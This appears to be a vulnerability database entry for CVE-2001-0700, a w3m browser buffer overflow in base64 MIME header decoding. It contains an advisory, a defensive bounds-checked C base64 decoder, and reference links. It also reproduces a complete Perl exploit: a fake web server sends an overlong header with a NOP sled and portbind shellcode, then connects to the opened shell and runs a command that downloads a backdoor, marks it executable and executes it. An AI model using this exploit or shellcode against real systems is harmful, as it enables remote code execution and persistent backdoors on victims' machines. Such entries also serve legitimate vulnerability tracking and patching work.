w3m buffer overflow vulnerability

Vulnerability ID 1106396 Vulnerability type Buffer overflow
Published 2001-06-19 Updated 2005-05-02
CVE ID CVE-2001-0700
CNNVD ID CNNVD-200109-099
Platform FreeBSD CVSS score 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/20941
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200109-099
|Vulnerability details
w3m 0.2.1 and earlier versions contain a buffer overflow vulnerability. A remote attacker can execute arbitrary code by means of an overly long base64-encoded MIME header.
|Exploit
source: http://www.securityfocus.com/bid/2895/info

W3M is a pager/text-based WWW browser similar to lynx.

A buffer overflow vulnerability exists in the 'w3m' client program. The overflow occurs when a base64-encoded string exceeding approximately 32 characters in length is received in a MIME header field. As a result, it may be possible for a malicious remote server to execute arbitrary code on a user's system.
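The defect described above is the classic one: base64 text taken from a header is decoded into a buffer of fixed size without first checking whether the decoded data fits. The following C program is an added example, not w3m's code and not part of the original advisory or exploit. It parses an RFC 2047 "B" encoded-word of the form =?charset?B?base64?=, computes the decoded size from the input length before writing anything, and refuses to decode when the result would exceed the buffer. The DECODED_MAX constant, the function names and the sample headers are constructed for this example; the 32-byte figure is taken from the description above, not from w3m's source.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Capacity of the fixed decoded-text buffer. Constructed for this example
 * from the "about 32 characters" figure in the advisory; not w3m's constant. */
#define DECODED_MAX 32

/* Map one base64 alphabet character to its 6-bit value, or -1 if invalid. */
static int b64_value(char c) {
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

/* Bounds-checked base64 decode of in[0..in_len) into out[0..out_cap).
 * Returns the decoded length, -1 for malformed input, or -2 when the decoded
 * data would not fit. The size check happens before any byte is written,
 * which is exactly the check a fixed-buffer decoder needs to avoid the overflow. */
int b64_decode_bounded(const char *in, size_t in_len,
                       unsigned char *out, size_t out_cap) {
    if (in_len == 0 || in_len % 4 != 0) return -1;
    size_t pad = 0;
    if (in[in_len - 1] == '=') pad++;
    if (in[in_len - 2] == '=') pad++;
    /* '=' may appear only as trailing padding; everything else must be alphabet. */
    for (size_t i = 0; i < in_len; i++) {
        if (in[i] == '=') { if (i + pad < in_len) return -1; }
        else if (b64_value(in[i]) < 0) return -1;
    }
    size_t need = in_len / 4 * 3 - pad;
    if (need > out_cap) return -2;          /* refuse instead of overflowing */
    size_t o = 0;
    for (size_t i = 0; i < in_len; i += 4) {
        unsigned triple = 0;
        for (int k = 0; k < 4; k++) {
            int v = (in[i + k] == '=') ? 0 : b64_value(in[i + k]);
            triple = (triple << 6) | (unsigned)v;
        }
        if (o < need) out[o++] = (unsigned char)(triple >> 16);
        if (o < need) out[o++] = (unsigned char)(triple >> 8);
        if (o < need) out[o++] = (unsigned char)triple;
    }
    return (int)o;
}

/* Parse one RFC 2047 encoded-word of the form =?charset?B?base64?= and decode
 * its payload into a DECODED_MAX-byte buffer. Returns the decoded length,
 * -1 if the word is malformed or uses an encoding other than B,
 * -2 if the decoded payload is too long for the buffer. */
int decode_b_encoded_word(const char *word, unsigned char out[DECODED_MAX]) {
    if (strncmp(word, "=?", 2) != 0) return -1;
    const char *enc = strchr(word + 2, '?');          /* end of charset */
    if (!enc || (enc[1] != 'B' && enc[1] != 'b') || enc[2] != '?') return -1;
    const char *data = enc + 3;
    const char *end = strstr(data, "?=");
    if (!end) return -1;
    return b64_decode_bounded(data, (size_t)(end - data), out, DECODED_MAX);
}

/* Helpers so results can be checked without the caller owning a buffer. */
int decode_status(const char *word) {
    unsigned char buf[DECODED_MAX];
    return decode_b_encoded_word(word, buf);
}

int decodes_to(const char *word, const char *expected) {
    unsigned char buf[DECODED_MAX];
    int n = decode_b_encoded_word(word, buf);
    return n == (int)strlen(expected) && memcmp(buf, expected, (size_t)n) == 0;
}

int main(void) {
    /* Both header values are constructed sample input. */
    const char *ok  = "=?ISO-8859-1?B?SGVsbG8=?=";
    const char *big = "=?US-ASCII?B?" "QUFBQUFBQUFB" "QUFBQUFBQUFB"
                      "QUFBQUFBQUFB" "QUFBQUFBQUFB" "?=";   /* 48 chars -> 36 bytes */
    printf("%s -> status %d\n", ok, decode_status(ok));
    printf("oversized encoded-word -> status %d (rejected, not written)\n",
           decode_status(big));
    return 0;
}
```

The important design choice is that the decoded length is derived arithmetically from the input length and padding before the decode loop runs, so an oversized header is rejected with an error code rather than discovered after the buffer has already been overrun.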

#!/usr/bin/perl

# ---- exp_w3m.pl
# w3m remote buffer overflow exploit for FreeBSD.
# this fake httpd gives exploit code to visitor's w3m, then
# connects to victim's port 10000, downloads backdoor from
# $backdoor, and executes it.
# see also:
# ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:46.w3m.asc
# 
# 					White_E <[email protected]>
# 					http://ttj.virtualave.net/

$backdoor='http://www.../any.backdoor.prog.you.want';
$ret = 0xbfbffa2c;
$ret -= $ARGV[0];        # optional offset adjustment from the command line
$retb = pack("V",$ret);  # little endian

$shellcode= # http://www.hack.co.za/download.php?sid=1444
            # portbind shell on 10000 by bighawk
"\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89".
"\xc3\x52\x66\x68\x27\x10\x66\x51\x89\xe6\xb1\x10\x51\x56\x50".
"\x50\xb0\x68\xcd\x80\x51\x53\x53\xb0\x6a\xcd\x80\x52\x52\x53".
"\x53\xb0\x1e\xcd\x80\xb1\x03\x89\xc3\xb0\x5a\x49\x51\x53\x53".
"\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69".
"\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80"; # 86 bytes

use Socket;
$port=80;
$|=1;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
select(S);$|=1;select(STDOUT);
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
$paddr=sockaddr_in($port,INADDR_ANY);
bind(S,$paddr) || die "ERR: bind()\n";
listen(S,SOMAXCONN) || die "ERR: listen()\n";
print "listen on $port.\n";
# overflow string: filler, return address, NOP sled, shellcode
$str  = "A" x 36;
$str .= $retb;
$str .= "\x90" x 128;
$str .= $shellcode;

while (1) {
  $victim=accept(VIC,S);
  $vaddr=(sockaddr_in($victim))[1];
  select(VIC);$|=1;select(STDOUT);
  $in=<VIC>;
  $in=<VIC>;
  # the overlong value is delivered inside a MIME header field
  print VIC "HTTP/1.0 200 OK\r\n";
  print VIC "MIME-Version: 1.0\r\n";
  print VIC "Content-Type: multipart/mixed; boundary=\"__=?$str\r\n";
  print VIC "\r\n";
  sleep(1);
  socket(BD,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
  $paddr=sockaddr_in('10000',$vaddr) || die "ERR: sockaddr_in\n";
  connect(BD,$paddr) || die "ERR: connect()\n";
  select(BD);$|=1;select(STDOUT);
  print BD "/usr/local/bin/w3m -dump_source $backdoor > /tmp/hoge ; /bin/chmod +x /tmp/hoge ; /tmp/hoge & \n";
  print "backdoor has been set.\n";
  close(BD);
}
|References

Source: XF
Name: w3m-mime-header-bo(6725)
Link: http://xforce.iss.net/static/6725.php
Source: BID
Name: 2895
Link: http://www.securityfocus.com/bid/2895
Source: mi.med.tohoku.ac.jp
Link: http://mi.med.tohoku.ac.jp/~satodai/w3m-dev-en/200106.month/537.html
Source: BUGTRAQ
Name: 20010621 [SNS Advisory No.32] w3m malformed MIME header Buffer Overflow Vulnerability
Link: http://www.securityfocus.com/archive/1/192371
Source: DEBIAN
Name: DSA-081
Link: http://www.debian.org/security/2001/dsa-081
Source: DEBIAN
Name: DSA-064
Link: http://www.debian.org/security/2001/dsa-064
Source: CONECTIVA
Name: CLA-2001:434
Link: http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio;=000434